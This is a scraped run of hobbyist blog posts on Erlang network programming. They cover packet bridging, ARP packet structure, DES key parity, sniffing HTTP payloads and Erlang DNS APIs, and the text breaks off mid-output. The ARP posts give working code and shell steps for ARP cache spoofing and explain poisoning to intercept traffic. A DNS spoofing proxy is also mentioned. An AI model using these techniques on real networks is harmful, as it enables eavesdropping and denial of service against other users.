</ol><p/>An Erlang binary representation of an Ethernet II frame: <pre class="Code"><span class="Statement"><<</span>
<span class="Identifier">Dhost</span>:<span class="Constant">6</span><span class="Statement">/</span><span class="Constant">bytes</span>, <span class="Comment">% destination MAC address</span>
<span class="Identifier">Shost</span>:<span class="Constant">6</span><span class="Statement">/</span><span class="Constant">bytes</span>, <span class="Comment">% source MAC address</span>
<span class="Identifier">Type</span>:<span class="Constant">16</span> <span class="Comment">% protocol type, usually ETH_P_IP</span>
<span class="Statement">>></span>
</pre><h2>Using Erlang to Bridge Packets</h2>To go along with the <a href="http://blog.listincomprehension.com/2010/10/fun-with-raw-sockets-in-erlang-arp.html">ARP poisoning</a>, we need a sort of "one armed bridging" to forward packets from our spoofing host to the real destinations. Once <a href="http://github.com/msantos/herp/blob/master/src/herp.erl#L134">we have the raw ethernet frames</a>, doing the bridging is quite simple. For the complete code, see <a href="http://github.com/msantos/herp">herp</a> on GitHub (yes, the herp is what you get when you've been promiscuous. I hear like 80% of adults have it). <p/>I won't include much of the code here because it's so trivial. The bridging process captures packets off the network and pattern matches on the headers: <pre class="Code">filter(<span class="Type">#ether</span><span class="Special">{</span><span class="Constant">shost</span> <span class="Statement">=</span> <span class="Identifier">MAC</span><span class="Special">}</span>, <span class="Identifier">_</span>, <span class="Type">#state</span><span class="Special">{</span><span class="Constant">mac</span> <span class="Statement">=</span> <span class="Identifier">MAC</span><span class="Special">}</span>) <span class="Statement">-></span>
<span class="Constant">ok</span>;
filter(<span class="Type">#ether</span><span class="Special">{</span><span class="Constant">type</span> <span class="Statement">=</span> <span class="PreProc">?ETH_P_IP</span><span class="Special">}</span>, <span class="Identifier">Packet</span>, <span class="Identifier">State</span>) <span class="Statement">-></span>
<span class="Special">{</span><span class="Type">#ipv4</span><span class="Special">{</span><span class="Constant">daddr</span> <span class="Statement">=</span> <span class="Identifier">DA</span><span class="Special">}</span>, <span class="Identifier">_</span><span class="Special">}</span> <span class="Statement">=</span> epcap_net:ipv4(<span class="Identifier">Packet</span>),
filter1(<span class="Identifier">DA</span>, <span class="Identifier">Packet</span>, <span class="Identifier">State</span>);
filter(<span class="Identifier">_</span>, <span class="Identifier">_</span>, <span class="Identifier">_</span>) <span class="Statement">-></span>
<span class="Constant">ok</span>.
filter1(<span class="Identifier">IP</span>, <span class="Identifier">_</span>, <span class="Type">#state</span><span class="Special">{</span><span class="Constant">ip</span> <span class="Statement">=</span> <span class="Identifier">IP</span><span class="Special">}</span>) <span class="Statement">-></span>
<span class="Constant">ok</span>;
filter1(<span class="Identifier">IP</span>, <span class="Identifier">Packet</span>, <span class="Type">#state</span><span class="Special">{</span><span class="Constant">gw</span> <span class="Statement">=</span> <span class="Identifier">GW</span><span class="Special">}</span>) <span class="Statement">-></span>
<span class="Identifier">MAC</span> <span class="Statement">=</span> <span class="Statement">case</span> packet:arplookup(<span class="Identifier">IP</span>) <span class="Statement">of</span>
<span class="Constant">false</span> <span class="Statement">-></span> <span class="Identifier">GW</span>;
<span class="Special">{</span><span class="Identifier">M1</span>,<span class="Identifier">M2</span>,<span class="Identifier">M3</span>,<span class="Identifier">M4</span>,<span class="Identifier">M5</span>,<span class="Identifier">M6</span><span class="Special">}</span> <span class="Statement">-></span> <span class="Statement"><<</span><span class="Identifier">M1</span>,<span class="Identifier">M2</span>,<span class="Identifier">M3</span>,<span class="Identifier">M4</span>,<span class="Identifier">M5</span>,<span class="Identifier">M6</span><span class="Statement">>></span>
<span class="Statement">end</span>,
bridge(<span class="Identifier">MAC</span>, <span class="Identifier">Packet</span>).
</pre><ol><li>Check if the frame has our MAC address<br />
<li>Retrieve the IP address from the frame and check the system ARP cache. A real bridge would monitor the network for ARP packets and cache the results.<br />
<li>If the IP exists in our ARP cache, use the MAC address, otherwise, send it to the gateway (it's possible the IP address does not exist in the system ARP cache and will be wrongly forwarded to the gateway)<br />
</ol>If the frame should be bridged, we create a new frame with the source hardware address set to our host's MAC address. The IP header and payload are not touched. <pre class="Code">handle_call(<span class="Special">{</span><span class="Constant">packet</span>, <span class="Identifier">DstMAC</span>, <span class="Identifier">Packet</span><span class="Special">}</span>, <span class="Identifier">_From</span>, <span class="Type">#state</span><span class="Special">{</span>
<span class="Constant">mac</span> <span class="Statement">=</span> <span class="Identifier">MAC</span>,
<span class="Constant">s</span> <span class="Statement">=</span> <span class="Identifier">Socket</span>,
<span class="Constant">i</span> <span class="Statement">=</span> <span class="Identifier">Ifindex</span><span class="Special">}</span> <span class="Statement">=</span> <span class="Identifier">State</span>) <span class="Statement">-></span>
<span class="Identifier">Ether</span> <span class="Statement">=</span> epcap_net:ether(<span class="Type">#ether</span><span class="Special">{</span>
<span class="Constant">dhost</span> <span class="Statement">=</span> <span class="Identifier">DstMAC</span>,
<span class="Constant">shost</span> <span class="Statement">=</span> <span class="Identifier">MAC</span>,
<span class="Constant">type</span> <span class="Statement">=</span> <span class="PreProc">?ETH_P_IP</span>
<span class="Special">}</span>),
packet:send(<span class="Identifier">Socket</span>, <span class="Identifier">Ifindex</span>, <span class="Statement">list_to_binary</span>(<span class="Special">[</span><span class="Identifier">Ether</span>, <span class="Identifier">Packet</span><span class="Special">]</span>)),
<span class="Special">{</span><span class="Constant">reply</span>, <span class="Constant">ok</span>, <span class="Identifier">State</span><span class="Special">}</span>;
</pre><br />
It'd be interesting to experiment with making herp into a traditional network bridge: quite likely very slow, but also redundant, distributed and fault tolerant.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-47029578624484545302010-10-25T15:16:00.004-04:002010-10-25T15:25:00.309-04:00Fun with Raw Sockets in Erlang: ARP PoisoningOn IP ethernet networks, hosts use a peer to peer method called <a href="http://en.wikipedia.org/wiki/Address_Resolution_Protocol">ARP (address resolution protocol)</a> to discover the hardware address of the peer with which they intend to communicate.<br />
<br />
IPv4 ethernet ARP packets are specified as:<br />
<ul class="Message"><li class="Message">Hardware Type:16</li>
<li class="Message">Protocol Type:16</li>
<li class="Message">Hardware Length:8</li>
<li class="Message">Protocol Length:8</li>
<li class="Message">Operation:16</li>
<li class="Message">Sending Hardware Address:48</li>
<li class="Message">Sending IP Address:32</li>
<li class="Message">Target Hardware Address:48</li>
<li class="Message">Target IP Address:32</li>
</ul><p/>The numbers after the colon represent the size in bits of the field.<br />
<ul><li>The <b>Hardware Type</b> of the network is ethernet, so the value is set to ARPHRD_ETHER (1)<br />
<li>The <b>Protocol Type</b> of the network is IPv4, so the value is set to ETH_P_IP (0x0800)<br />
<li>The <b>Hardware Length</b> of an ethernet MAC address is 6 bytes<br />
<li>The <b>Protocol Length</b> of an IPv4 address is 4 bytes<br />
<li><b>Operation</b> is usually an ARP request (ARPOP_REQUEST (1)) or reply (ARPOP_REPLY (2))<br />
<li>The <b>Sending Hardware Address</b> is the MAC address of the host sending the ARP packet<br />
<li>The <b>Sending IP Address</b> is the IPv4 address of the host sending the ARP packet<br />
<li>The <b>Target Hardware Address</b> is the MAC address of the host receiving the ARP packet<br />
<br />
The target address may be the ethernet broadcast address (FF:FF:FF:FF:FF:FF or 00:00:00:00:00:00) which results in all hosts receiving the ARP packet.<br />
<br />
<li>The <b>Target IP Address</b> is the IPv4 address of the host sending the ARP packet<br />
</ul>The corresponding Erlang representation of an IPv4 ethernet ARP packet is: <pre class="Code"><span class="Statement"><<</span><span class="Identifier">Hrd</span>:<span class="Constant">16</span>, <span class="Identifier">Pro</span>:<span class="Constant">16</span>,
<span class="Identifier">Hln</span>:<span class="Constant">8</span>, <span class="Identifier">Pln</span>:<span class="Constant">8</span>, <span class="Identifier">Op</span>:<span class="Constant">16</span>,
<span class="Identifier">Sha</span>:<span class="Constant">48</span>, <span class="Identifier">Sip</span>:<span class="Constant">32</span>,
<span class="Identifier">Tha</span>:<span class="Constant">48</span>, <span class="Identifier">Tip</span>:<span class="Constant">48</span><span class="Statement">>></span>
</pre><h2>Behaviour of the ARP Cache</h2>ARP caches are key/value stores holding a mapping of the protocol address to the hardware address. To prevent caching of stale data, entries eventually expire. The expiry timeout varies; for example, <a href="http://technet.microsoft.com/en-us/library/cc786759(WS.10).aspx">on MS Windows</a>, arp entries are kept for 2 minutes if another session to the remote host is not initiated. If a session is initiated within the 2 minute period, the ARP cache expiry time is extended to 10 minutes.
<p/>ARP is opportunistic and trust-based. If a host sees an ARP request or reply for which it is not the target, the host may cache the information. However, caching all requests would be pointless, since arp lookup would be slow on a network with a large number of peers with which the host might never communicate. <h2>Gratuitous ARPs</h2>ARPs are gratuitous when no request was made for the information. Gratuitous ARPs are useful for: <ul><li>discovering IP conflict<br />
<li>IP take over: in a high availability cluster of servers, one of the hosts is active (holding the service IP address). In the event of a failure of the active node, one of the slave nodes can assume the service IP address, sending a gratuitous ARP to inform the other nodes and the gateway that the IP address is associated with a new MAC address<br />
</ul>An Erlang binary representing a gratuitous ARP looks like: <pre class="Code"><span class="Statement"><<</span>
<span class="Constant">1</span>:<span class="Constant">16</span>, <span class="Comment">% hardware type</span>
<span class="Constant">16#0800</span>:<span class="Constant">16</span>, <span class="Comment">% protocol type</span>
<span class="Constant">6</span>:<span class="Constant">8</span>, <span class="Comment">% hardware length</span>
<span class="Constant">4</span>:<span class="Constant">8</span>, <span class="Comment">% protocol length</span>
<span class="Constant">2</span>:<span class="Constant">16</span>, <span class="Comment">% operation: ARPOP_REPLY</span>
<span class="Constant">0</span>,<span class="Constant">1</span>,<span class="Constant">2</span>,<span class="Constant">3</span>,<span class="Constant">4</span>,<span class="Constant">5</span>, <span class="Comment">% sending MAC address</span>
<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">1</span>,<span class="Constant">100</span>, <span class="Comment">% sending IPv4 address</span>
<span class="Constant">16#FF</span>,<span class="Constant">16#FF</span>,<span class="Constant">16#FF</span>,<span class="Constant">16#FF</span>,<span class="Constant">16#FF</span>,<span class="Constant">16#FF</span>, <span class="Comment">% target MAC address: ethernet broadcast</span>
<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">1</span>,<span class="Constant">100</span> <span class="Comment">% target IPv4 address: set to sending address</span>
<span class="Statement">>></span>
</pre>Behaving badly by gratuitously arp'ing for all the IP addresses on the network will DoS the other hosts, eventually forcing them to report a network error condition and go offline. <h2>Sending an ARP Reply</h2>To send an ARP packet from Erlang, we'll use the <a href="http://github.com/msantos/procket">procket</a> module on GitHub. The functions in procket used for these examples are unfortunately Linux-only. For this example, the binaries are manually specified. The <a href="http://github.com/msantos/epcap">epcap_net</a> module on GitHub has convenience functions for creating and decomposing ARP packets into a record structure. <script src="http://gist.github.com/645491.js?file=carp.erl"></script> If the network was set up like: <ul><li>arping Erlang node: 10.11.11.9<br />
<li>source host: 10.11.11.10<br />
<li>target host (doesn't exist): 10.11.11.11<br />
</ul>Login to another host on your network (the source node) and run tcpdump: <pre>tcpdump -n -e arp
</pre>In another window, run the code: <pre>$ erl -pa /path/to/procket/ebin
Erlang R14B01 (erts-5.8.2) [source] [smp:2:2] [rq:2] [async-threads:0] [hipe] [kernel-poll:false]
Eshell V5.8.2 (abort with ^G)
1> carp:send({10,11,11,11}). % Use an address on your network
</pre>If the MAC address of the Erlang node is 00:aa:bb:cc:dd:ee, then on the other host you should see something like: <pre>00:59:35.051302 00:aa:bb:cc:dd:ee > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 60: arp reply 10.11.11.11 is-at 00:aa:bb:cc:dd:ee
</pre>Check the ARP cache on the source node: <pre>arp -an
</pre>The ARP entry may not exist. Since ARP caching is opportunistic, it is up to a host to decide whether it will optimize future connections by caching an unsolicited entry. To force an ARP cache entry on the remote host, ping the fake IP address: <pre>ping 10.11.11.11
</pre>Then, in the Erlang shell, run carp:send/1. Run "arp -an" again on the remote host. The ARP cache entry for 10.11.11.11 should now be there. <pre>? (10.11.11.11) at 00:aa:bb:cc:dd:ee [ether] on eth0
</pre>If you run tcpdump on the host doing the ARP'ing, you should see ICMP traffic for 10.11.11.11: <pre>01:13:36.075040 IP 10.11.11.10 > 10.11.11.11: ICMP echo request, id 35604, seq 17, length 64
01:13:36.088794 IP 10.11.11.10 > 10.11.11.11: ICMP echo request, id 35604, seq 18, length 64
01:13:36.106572 IP 10.11.11.10 > 10.11.11.11: ICMP echo request, id 35604, seq 19, length 64
</pre>Since this IP address is not bound to any interface on your host, there will, of course, be no reply. <h2>Poisoning the ARPs</h2>On old networks using hubs or open networks using 802.11 access points, data is broadcasted to all the hosts. Running a packet sniffer displays the network activity for everyone, not just yourself.
<p/>Switched networks learn the MAC address of the host connected to the port of the switch and send data only to the recipient. ARP poisoning or spoofing fools other hosts on the network to send data to the host under your control. If your host spoofs the gateway, you'll also see the internet traffic. Obviously, if your host is not somehow routing, the packets will go nowhere, performing a denial of service on your network. But you will be able to see the data other hosts are sending.
<p/>Using the code we ran earlier, we can test ARP spoofing. You'll need 3 hosts: one doing the poisoning and two victims, a source and a target. The process is the same as above. For example, if 10.11.11.11 were a real host, we would have convinced 10.11.11.10 to send its data through our host.
<p/>I've put my experiment in progress with ARP poisoning, <a href="http://github.com/msantos/farp">farp</a>, on GitHub. farp works by replying to ARP requests with our host's MAC address. It can also optionally send out gratuitous arps as the gateway to speed up the process.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-8577871288924093307.post-56903480237136233792010-10-17T13:54:00.006-04:002010-11-10T18:53:49.269-05:00Setting Parity on DES KeysDES keys are 8 bytes, of which only 7 bits of each byte are used for the key. The least significant bit is used for parity and is thrown away for the actual encryption/decryption (resulting in a 56-bit key for single DES). Mostly, it seems, the parity is ignored by DES implementations, but occasionally a system using DES will check the parity and reject the key if the parity is not odd (or so Google tells me, I've never actually seen this happen). The parity bit was intended to prevent corruption or <a href="http://cryptome.org/jya/radfa.htm">tampering</a> with the key.<br />
<br />
The DES parity calculation works as follows:<br />
<pre>00001001 = 9
</pre><ul><li>for each byte, count the number of bits that are set. For the example byte above, 2 bits are set<br />
<li>if the number of bits set is odd, do nothing<br />
<li>if the number of bits is even, set or unset the least significant bit to make the count odd<br />
</ul>In the example, the new value for the byte would be <pre>00001000 = 8
</pre>Reading through Erlang's <a href="http://www.erlang.org/doc/man/crypto.html#des_cbc_encrypt-3">crypto support for DES and DES3</a>, it's up to the caller to use a valid key. For example, the NIF making up <a href="http://github.com/erlang/otp/blob/OTP_R14B/lib/crypto/c_src/crypto.c#L563">crypto:des_cbc_crypt/3</a> is defined as: <pre>DES_set_key((const_DES_cblock*)key.data, &schedule);
DES_ncbc_encrypt(text.data, enif_make_new_binary(env, text.size, &ret),
text.size, &schedule, &ivec_clone, (argv[3] == atom_true));
</pre><a href="http://www.openssl.org/docs/crypto/des.html">DES_set_key()</a> is an OpenSSL compatibility function that, in this case, is identical to DES_set_key_unchecked(). The corresponding checking function, DES_set_key_checked(), returns some information about the key: -1 (if the parity is even) and -2 (if the key is weak). <p/>So I was curious how to go about setting the parity in a functional language. It turns out to be quite easy: <pre class="Code"><span class="Statement">-module</span>(des_key).
<span class="Statement">-export</span>(<span class="Special">[</span>set_parity<span class="Statement">/</span><span class="Constant">1</span>, check_parity<span class="Statement">/</span><span class="Constant">1</span>, odd_parity<span class="Statement">/</span><span class="Constant">1</span><span class="Special">]</span>).
set_parity(<span class="Identifier">Key</span>) <span class="Statement">-></span>
<span class="Statement"><<</span> <span class="Statement"><<</span>(check_parity(<span class="Identifier">N</span>))<span class="Statement">>></span> <span class="Statement">||</span> <span class="Statement"><<</span><span class="Identifier">N</span><span class="Statement">>></span> <span class="Statement"><=</span> <span class="Identifier">Key</span> <span class="Statement">>></span>.
check_parity(<span class="Identifier">N</span>) <span class="Statement">-></span>
<span class="Statement">case</span> odd_parity(<span class="Identifier">N</span>) <span class="Statement">of</span>
<span class="Constant">true</span> <span class="Statement">-></span> <span class="Identifier">N</span>;
<span class="Constant">false</span> <span class="Statement">-></span> <span class="Identifier">N</span> <span class="Statement">bxor</span> <span class="Constant">1</span>
<span class="Statement">end</span>.
odd_parity(<span class="Identifier">N</span>) <span class="Statement">-></span>
<span class="Identifier">Set</span> <span class="Statement">=</span> <span class="Statement">length</span>(<span class="Special">[</span> <span class="Identifier">1</span> <span class="Statement">||</span> <span class="Statement"><<</span><span class="Identifier">1</span>:<span class="Constant">1</span><span class="Statement">>></span> <span class="Statement"><=</span> <span class="Statement"><<</span><span class="Identifier">N</span><span class="Statement">>></span> <span class="Special">]</span>),
<span class="Identifier">Set</span> <span class="Statement">rem</span> <span class="Constant">2</span> <span class="Statement">==</span> <span class="Constant">1</span>.
</pre><p/>set_parity/1 uses a binary comprehension to read 1 byte at a time from the 8 byte key. <p/>check_parity/1 checks whether an integer has an odd or even parity and returns the integer XOR'ed with 1 if the parity is even. <p/>odd_parity/1 counts the bit set by using a bit comprehension to return the list of bits that are set. The modulus of the length of this list returns oddness/evenness. <p/>To test if this is correct, we can check if a few cases (all even bits or all odd bits in a key) work and then test that a key with corrected parity produces the same cipher text as the uncorrected key: <pre class="Code">test() <span class="Statement">-></span>
<span class="Statement"><<</span><span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span><span class="Statement">>></span> <span class="Statement">=</span> set_parity(<span class="Statement"><<</span><span class="Constant">0</span>:(<span class="Constant">8</span><span class="Statement">*</span><span class="Constant">8</span>)<span class="Statement">>></span>),
<span class="Statement"><<</span><span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span><span class="Statement">>></span> <span class="Statement">=</span> set_parity(<span class="Statement"><<</span><span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span>,<span class="Constant">1</span><span class="Statement">>></span>),
<span class="Identifier">K1</span> <span class="Statement">=</span> <span class="Statement"><<</span><span class="Constant">"Pa5Sw0rd"</span><span class="Statement">>></span>,
<span class="Identifier">K2</span> <span class="Statement">=</span> set_parity(<span class="Identifier">K1</span>),
<span class="Identifier">Enc</span> <span class="Statement">=</span> crypto:des_cbc_encrypt(<span class="Identifier">K1</span>, <span class="Statement"><<</span><span class="Constant">0</span>:<span class="Constant">64</span><span class="Statement">>></span>, <span class="Constant">"12345678"</span>),
<span class="Identifier">Enc</span> <span class="Statement">=</span> crypto:des_cbc_encrypt(<span class="Identifier">K2</span>, <span class="Statement"><<</span><span class="Constant">0</span>:<span class="Constant">64</span><span class="Statement">>></span>, <span class="Constant">"12345678"</span>),
<span class="Statement"><<</span><span class="Constant">"12345678"</span><span class="Statement">>></span> <span class="Statement">=</span> crypto:des_cbc_decrypt(<span class="Identifier">K2</span>, <span class="Statement"><<</span><span class="Constant">0</span>:<span class="Constant">64</span><span class="Statement">>></span>, <span class="Identifier">Enc</span>),
ok.
</pre>,Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-8577871288924093307.post-14977980315069641422010-08-31T21:16:00.003-04:002010-09-01T16:25:24.040-04:00Dumping Payloads with epcap and procket<a href="http://github.com/msantos/epcap">epcap</a> and <a href="http://github.com/msantos/procket">procket</a> allow Erlang code to sniff data off of a network. With either, once the packets are in the Erlang VM, manipulating the contents is straight forward using pattern matching.<br />
<h1>Which to use?</h1>epcap and procket sort of overlap in functionality. The main differences, at the moment, are:<br />
<ul><li>portability<br />
<br />
epcap: should work on any Unix with pcap installed<br />
<br />
procket: for sniffing, procket uses Linux's PF_PACKET socket option, so Linux only. I plan to add support for BPF someday, so maybe in the future procket will support BSD as well.<br />
<br />
<li>safety<br />
<br />
epcap: runs as a separate system process. Any bugs in epcap will not affect the Erlang VM.<br />
<br />
procket: linked into the Erlang VM using the NIF interface. Bugs may stall or crash the VM.<br />
<br />
<li>packet generation<br />
<br />
epcap: can only sniff packets<br />
<br />
procket: can generate whole packets. Again, currently Linux only, but should work under BSD's, like Mac OS X, when BPF is supported.<br />
<br />
Raw sockets (for example, <a href="http://blog.listincomprehension.com/2010/05/icmp-ping-in-erlang.html">generating ICMP echo packets</a>) work under BSD as well.<br />
<br />
In fact, it should be possible to combine the power of procket, epcap, and BSD to send and receive arbitrary TCP or UDP packets now (since TCP/UDP raw sockets can send data only, we need to use epcap to sniff the response).<br />
<br />
<li>filtering<br />
<br />
epcap: packet filtering rules are processed in C, either in the kernel or in a library.<br />
<br />
procket: all packets are received and must be filtered by an Erlang process<br />
</ul><h1>Decapsulating Packets</h1>procket and epcap have different ways of being started and reading packets but once the raw packets are received by an Erlang process, they can be decapsulated with a small module ("epcap_net.erl") distributed with epcap. Say, for example, we wanted to monitor http requests and write out a file containing just the client side: <script src="http://gist.github.com/559806.js?file=pdump.erl"></script> We request a raw socket from procket and then loop, polling the socket every 10ms for data. We look for established connections by matching packets with only the ACK bit set (we ignore connections in progress) and spawn another process to accumulate the data. When we see a packet indicating a connection has been closed, we tell the spawned process to write out its state to a file. The spawned process will also terminate if it reaches an arbitrary timeout. You've probably noticed that this code mimics some of the functionality of OTP behaviours. I wrote it this way for simplicity, but it certainly could be more compactly (and elegantly) written as a gen_server or a gen_fsm. <h1>Matching on Payloads</h1>A similar example with epcap: match on all http requests and write the complete transaction to a file based on the etag. <script src="http://gist.github.com/559809.js?file=dumpetag.erl"></script> epcap doesn't require polling as with procket. Instead, messages are received from the port similar to gen_tcp in <em>{active, true}</em> mode. The message contains some additional information about the length and time of the captured packet. For this example, we ignore it. We're only interested in the packet contents.<br />
<br />
Similar to the procket example, we loop, blocking in receive. When data is received, we check if the connection is in the established state, spawning a process to accumulate the data if we haven't seen this session before.<br />
<br />
Finally, we write out the data to the file system when the connection is closed, using the value of the "ETag" header for the file name. For succintness, I used a regular expression to match on the payload. Probably better to write a parser.<br />
<br />
Thanks, Zabrane, for suggesting this post!Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-70503245162115307412010-07-04T21:25:00.010-04:002010-11-06T11:15:47.399-04:00DNS Programming with ErlangI have this strange fascination with DNS. By which I mean loathing. Yet somehow I've already written 3 small DNS servers in Erlang:<br />
<ul><li><a href="http://github.com/msantos/emdns">emdns</a>: An unfinished multicast DNS server with unspecified yet no doubt awesome features. Someday I'll finish it. Maybe.<br />
<li> <a href="http://blog.listincomprehension.com/2010/06/fun-with-raw-sockets-in-erlang-spoofing.html">spood</a>: A strange, little program; a spoofing DNS proxy that will send out your DNS requests from somebody else's IP address and sniff the responses. Maybe (if you're somewhat sketchy) you could use it to hide your DNS lookups. Maybe, you could use it to ramp up your DNS requests on networks that throttle them down. Not that I would do any of that.<br />
<li><a href="http://github.com/msantos/seds">seds</a>: a DNS server that tunnels TCP/IP. I'm typing this blog over a DNS tunnel right now, stress testing it (with my blazing fast ASCII input) and trying to make seds crash. Also stress testing my patience.<br />
</ul>Since the programmatic interfaces to DNS in Erlang are mostly undocumented, I thought I'd go over them briefly. So I'll remember how to use them if I ever finish emdns. I figured out how they worked mainly by reading the source and dumping DNS packets to see the record structures. The DNS parsing functions are kept in <em>lib/kernel/src/inet_dns.erl</em>. Pretty much the only functions that you will need from this module are encode/1 and decode/1. The tricky part is passing in the appropriate data structures. <ul><li><em>decode/1</em> takes a binary and returns a #dns_rec{} record or {error, fmt} if the DNS payload cannot be decoded<br />
<li><em>encode/1</em> as you might expect, does the inverse, taking an appropriate record and returning a binary<br />
</ul>The record structure is defined in <em>lib/kernel/src/inet_dns.hrl</em>. <pre class="Code"><span class="Type">-record</span>(dns_rec,
{
header, <span class="Comment">%% dns_header record</span>
qdlist <span class="Statement">=</span> [], <span class="Comment">%% list of question entries</span>
anlist <span class="Statement">=</span> [], <span class="Comment">%% list of answer entries</span>
nslist <span class="Statement">=</span> [], <span class="Comment">%% list of authority entries</span>
arlist <span class="Statement">=</span> [] <span class="Comment">%% list of resource entries</span>
})<span class="Special">.</span>
</pre><ul><li>The DNS header is another record:<br />
<pre class="Code"><span class="Type">-record</span>(dns_header,
{
id <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% ushort query identification number</span>
<span class="Comment">%% byte F0</span>
qr <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% :1 response flag</span>
opcode <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% :4 purpose of message</span>
aa <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% :1 authoritive answer</span>
tc <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% :1 truncated message</span>
rd <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% :1 recursion desired</span>
<span class="Comment">%% byte F1</span>
ra <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% :1 recursion available</span>
pr <span class="Statement">=</span> <span class="Constant">0</span>, <span class="Comment">%% :1 primary server required (non standard)</span>
<span class="Comment">%% :2 unused bits</span>
rcode <span class="Statement">=</span> <span class="Constant">0</span> <span class="Comment">%% :4 response code</span>
})<span class="Special">.</span>
</pre>While the defaults are initialized to small integers, inet_dns replaces them with atoms. So, the 1 bit values are either the atoms 'true' or 'false' and the opcode is set to an atom, for example, 'query'. Both integers and the atom representations are usually accepted by the functions though.<br />
<br />
<li>qdlist is a list of DNS query records:<br />
<pre class="Code"><span class="Type">-record</span>(dns_query,
{
domain, <span class="Comment">%% query domain</span>
type, <span class="Comment">%% query type</span>
class <span class="Comment">%% query class</span>
})<span class="Special">.</span>
</pre><ul><li><em>domain</em> is a string representing the domain name, e.g., "foo.bar.example.com"<br />
<li><em>type</em> is an atom describing the DNS type: a, cname, txt, null, srv, ns, ...<br />
<li><em>class</em> will most commonly be 'in' (Internet), though multicast DNS uses "cache flush" (32769) for some operations<br />
</ul></ul><br />
Making a valid Erlang DNS query would look something like:<br />
<pre class="Code"><span class="Type">-module</span>(dns)<span class="Special">.</span>
<span class="Type">-compile</span>(export_all)<span class="Special">.</span>
<span class="Type">-include_lib</span>(<span class="Constant">"kernel/src/inet_dns.hrl"</span>)<span class="Special">.</span>
q(Domain, NS) <span class="Statement">-></span>
Query <span class="Statement">=</span> <span class="Identifier">inet_dns:encode</span>(
#dns_rec{
header <span class="Statement">=</span> #dns_header{
id <span class="Statement">=</span> <span class="Identifier">crypto:rand_uniform</span>(<span class="Constant">1</span>,<span class="Constant">16</span>#<span class="Constant">FFFF</span>),
opcode <span class="Statement">=</span> <span class="Type">'query'</span>,
rd <span class="Statement">=</span> <span class="Statement">true</span>
},
qdlist <span class="Statement">=</span> [#dns_query{
domain <span class="Statement">=</span> Domain,
type <span class="Statement">=</span> a,
class <span class="Statement">=</span> <span class="Special">in</span>
}]
}),
{ok, Socket} <span class="Statement">=</span> <span class="Identifier">gen_udp:open</span>(<span class="Constant">0</span>, [<span class="Identifier">binary</span>, {active, <span class="Statement">false</span>}]),
<span class="Identifier">gen_udp:send</span>(Socket, NS, <span class="Constant">53</span>, Query),
{ok, {NS, <span class="Constant">53</span>, Reply}} <span class="Statement">=</span> <span class="Identifier">gen_udp:recv</span>(Socket, <span class="Constant">65535</span>),
<span class="Identifier">inet_dns:decode</span>(Reply)<span class="Special">.</span>
</pre>I enabled recursion because the request will be going through the one of the public Google nameservers (8.8.8.8) instead of going directly through the authoritative nameserver.<br />
<br />
Testing the results:<br />
<pre class="Code">$ erl
Erlang R14A <span class="PreProc">(</span><span class="Special">erts</span><span class="Constant">-5</span><span class="Special">.</span><span class="Constant">8</span><span class="PreProc">)</span> <span class="Statement">[</span>source<span class="Statement">]</span> <span class="Statement">[</span>smp:<span class="Constant">2</span>:<span class="Constant">2</span><span class="Statement">]</span> <span class="Statement">[</span>rq:<span class="Constant">2</span><span class="Statement">]</span> <span class="Statement">[</span>async-threads:<span class="Constant">0</span><span class="Statement">]</span> <span class="Statement">[</span>hipe<span class="Statement">]</span> <span class="Statement">[</span>kernel-poll:false<span class="Statement">]</span>
Eshell V5.<span class="Constant">8</span> <span class="PreProc">(</span><span class="Special">abort with ^G</span><span class="PreProc">)</span>
<span class="Constant">1</span><span class="Statement">></span> <span class="Special">{</span>ok, Q<span class="Special">}</span> <span class="Statement">=</span> dns:q<span class="PreProc">(</span><span class="Statement">"</span><span class="Constant">listincomprehension.com</span><span class="Statement">"</span><span class="Special">, {</span><span class="Constant">8</span><span class="Special">,</span><span class="Constant">8</span><span class="Special">,</span><span class="Constant">8</span><span class="Special">,</span><span class="Constant">8</span><span class="Special">}</span><span class="PreProc">)</span>.
<span class="Special">{</span>ok,<span class="Special">{</span>dns_rec,<span class="Special">{</span>dns_header,<span class="Constant">7296</span>,true,<span class="Statement">'</span><span class="Constant">query</span><span class="Statement">'</span>,false,false,
true,true,false,<span class="Constant">0</span><span class="Special">}</span>,
<span class="Statement">[</span><span class="Special">{</span>dns_query,<span class="Statement">"</span><span class="Constant">listincomprehension.com</span><span class="Statement">"</span>,a,in<span class="Special">}</span><span class="Statement">]</span>,
<span class="Statement">[</span><span class="Special">{</span>dns_rr,<span class="Statement">"</span><span class="Constant">listincomprehension.com</span><span class="Statement">"</span>,a,in,<span class="Constant">0</span>,<span class="Constant">656</span>,
<span class="Special">{</span><span class="Constant">216</span>,<span class="Constant">239</span>,<span class="Constant">32</span>,<span class="Constant">21</span><span class="Special">}</span>, undefined,<span class="Statement">[]</span>,false<span class="Special">}</span>,
<span class="Special">{</span>dns_rr,<span class="Statement">"</span><span class="Constant">listincomprehension.com</span><span class="Statement">"</span>,a,in,<span class="Constant">0</span>,<span class="Constant">656</span>,
<span class="Special">{</span><span class="Constant">216</span>,<span class="Constant">239</span>,<span class="Constant">34</span>,<span class="Constant">21</span><span class="Special">}</span>,
